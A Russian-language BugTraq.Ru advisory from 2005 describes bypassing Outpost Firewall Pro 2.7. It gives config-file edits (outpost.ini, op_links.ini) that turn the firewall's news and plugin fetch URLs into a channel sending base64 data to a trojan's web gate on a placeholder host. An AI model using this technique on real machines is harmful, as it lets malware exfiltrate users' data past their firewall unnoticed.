BugTraq.Ru: Обход Outpost 2.7 // версия для печати

https://bugtraq.ru/rsn/archive/2005/09/07.html

Обход Outpost 2.7
dl // 14.09.05 00:56
Проверялась версия Outpost Firewall Pro ver.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/07.html]
2.7.492.5421 (416). Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для русскоязычной версии):

С:\...\Outpost Firewall\outpost.ini
[HttpAlerts]
...
NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис->загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис->загружать информацию о модулях
...

С:\...\Outpost Firewall\op_links.ini
NewsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data

При этом Outpost выдает предупреждение о том, что его главный модуль пытается соединиться с внешним миром, но это выглядит достаточно безобидно.

Источник: $aSH

предложить новость | обсудить | все отзывы (1) [9468]

назад « » вперед

последние новости

Microsoft обещает радикально усилить безопасность Windows в следующем году // 19.11.24 17:09
Ядро Linux избавляется от российских мейнтейнеров // 23.10.24 23:10
20 лет Ubuntu // 20.10.24 19:11
Tailscale окончательно забанила российские адреса // 02.10.24 18:54
Прекращение работы антивируса Касперского в США // 30.09.24 17:30
Microsoft Authenticator теряет пользовательские аккаунты // 05.08.24 22:21
Облачнолазурное // 31.07.24 17:34

Комментарии: